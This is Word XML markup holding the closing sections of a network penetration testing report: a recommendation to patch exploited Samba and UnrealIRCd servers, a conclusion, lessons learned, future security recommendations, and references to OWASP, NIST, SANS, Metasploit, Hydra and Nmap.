    <w:p w14:paraId="1750E65B" w14:textId="77777777" w:rsidR="00314E34" w:rsidRDefault="00314E34" w:rsidP="00607D37"/>
    <w:p w14:paraId="4F251C02" w14:textId="77777777" w:rsidR="00607D37" w:rsidRPr="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607D37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 4.4.4 Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB05B7B" w14:textId="77777777" w:rsidR="00607D37" w:rsidRDefault="00607D37" w:rsidP="00607D37"/>
    <w:p w14:paraId="7ED18C00" w14:textId="2FF0FA2D" w:rsidR="004706AA" w:rsidRPr="0034765E" w:rsidRDefault="00E90321" w:rsidP="00607D37">
      <w:r w:rsidRPr="00E90321">
        <w:t>It is recommended that security fixes installed ASAP in order to resolve the vulnerabilities that were exploited in the Samba and UnrealIRCd servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A016F" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62"/>
    <w:p w14:paraId="7DBDD7AA" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62"/>
    <w:p w14:paraId="7AEFDBD5" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62"/>
    <w:p w14:paraId="6CEA40B6" w14:textId="77777777" w:rsidR="00E90321" w:rsidRDefault="00E90321" w:rsidP="002C4E62"/>
    <w:p w14:paraId="24797582" w14:textId="77777777" w:rsidR="00E90321" w:rsidRDefault="00E90321" w:rsidP="002C4E62"/>
    <w:p w14:paraId="5A69B005" w14:textId="77777777" w:rsidR="00E90321" w:rsidRDefault="00E90321" w:rsidP="002C4E62"/>
    <w:p w14:paraId="4C01D24D" w14:textId="77777777" w:rsidR="00E90321" w:rsidRDefault="00E90321" w:rsidP="002C4E62"/>
    <w:p w14:paraId="246702BE" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62"/>
    <w:p w14:paraId="7C65EC91" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4E62">
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.0 Additional Items</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D31706F" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB3329C" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A94DE2" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B543C0" w14:textId="152D70CB" w:rsidR="002C4E62" w:rsidRDefault="00E90321" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90321">
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>In conclusion, the Network Penetration Testing Assessment discovered major vulnerabilities across several attack vectors, including Buffer Overflow, Web Attacks, Password Attacks, and Metasploit Exploitation. The evaluation underlined the significance of proactive security measures to limit the risk of exploitation and unauthorized access to critical systems and data. By fixing the discovered vulnerabilities and following the suggested security measures, companies may boost their cybersecurity posture and decrease the potential im-pact of hostile attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7D11F8" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="002C4E62" w:rsidRDefault="00E90321" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF4ECFF" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B34E116" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7D9B22"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From this penetration testing evaluation, many major insights may be gleaned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B52611"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 The relevance of undertaking frequent security assessments to discover and address vulnera-bilities before they are exploited by bad actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3082354A"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 The vital need of employing safe coding techniques and effective security measures to minimize typical attack vectors, such as buffer overflows, SQL injection, and Cross-Site Script-ing (XSS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E432CEE"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 The usefulness of thorough security awareness training enables workers to spot and report suspicious activity, including as phishing attempts and social engineering strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EDB93" w14:textId="421F6028" w:rsidR="002C4E62" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90321">
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>- The requirement for continual monitoring and incident response capabilities to identify and react to security issues in a timely way, limiting the possible effect on company operations and data integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FF02C3" w14:textId="77777777" w:rsidR="007B683D" w:rsidRDefault="007B683D" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB5438F" w14:textId="77777777" w:rsidR="007B683D" w:rsidRDefault="007B683D" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BCAF3C" w14:textId="77777777" w:rsidR="00E90321" w:rsidRDefault="00E90321" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15421F57" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="002C4E62" w:rsidRDefault="00E90321" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251A8167" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.3 Future Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E30E95" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="203CEC1E"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To further increase the organization's cybersecurity posture, the following measures are proposed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3AFF88" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="00E90321" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E69ECEE"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 Implement a systematic vulnerability management program to frequently scan and analyze the secu-rity posture of network infrastructure, applications, and systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B34F37"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 Conduct frequent penetration testing operations to proactively identify and resolve possible secu-rity issues before they are exploited by attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2A1E9"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 Invest in staff training and awareness initiatives to foster a culture of cybersecurity knowledge and vigilance across the firm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A3294" w14:textId="77777777" w:rsidR="00E90321" w:rsidRPr="00E90321" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90321">
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>- Stay updated on new cybersecurity risks and vulnerabilities related to the organi-zation's industrial sector and technical environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535084E1" w14:textId="2FB2FD75" w:rsidR="002C4E62" w:rsidRPr="002C4E62" w:rsidRDefault="00E90321" w:rsidP="00E90321">
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E90321">
        <w:rPr>
          <w:rStyle w:val="None"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>- Continuously monitor and update security controls, policies, and processes to react to evolv-ing cybersecurity risks and regulatory requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530695E9" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3614215F" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A8C02C" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4763393E" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1097552B" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73974471" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC5193F" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46DBE028" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54488335" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D62A1FD" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A3B3C14" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341E543A" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21610629" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BE0137" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A716FEB" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC6CC4B" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC7C8DF" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B9B255" w14:textId="77777777" w:rsidR="00174E66" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4B8585" w14:textId="14EDE543" w:rsidR="00174E66" w:rsidRPr="002C4E62" w:rsidRDefault="00174E66" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB1F43F" w14:textId="77777777" w:rsidR="002C4E62" w:rsidRDefault="002C4E62" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4E62">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.4 References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF85F6D" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="002C4E62" w:rsidRDefault="00217239" w:rsidP="002C4E62">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BB7855D" w14:textId="79074B75" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Open Web Application Security Project (OWASP).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  OWASP Top Ten.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidR="00A415E5" w:rsidRPr="0017527C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://owasp.org/top10/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A842783" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AECA78E" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. National Institute of Standards and Technology (NIST).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  NIST Special Publication 800-53: Security and Privacy Controls for Information Systems and Organizations.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53E4B9B1" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08B4A39B" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. SANS Institute</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.  SANS Critical Security Controls.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.sans.org/critical-security-controls/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14F51ECB" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAB0F0A" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. National Vulnerability Database (NVD).</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F6CBC70" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7985EB4D" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Metasploit Framework.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Rapid7. </w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="21A0E847" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FBB6A6" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Hydra.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  GitHub Repository.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId60" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://github.com/vanhauser-thc/thc-hydra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="379AC364" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="474698F0" w14:textId="77777777" w:rsidR="00217239" w:rsidRPr="00217239" w:rsidRDefault="00217239" w:rsidP="00217239">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Nmap.</w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00217239">
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="00217239">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://nmap.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
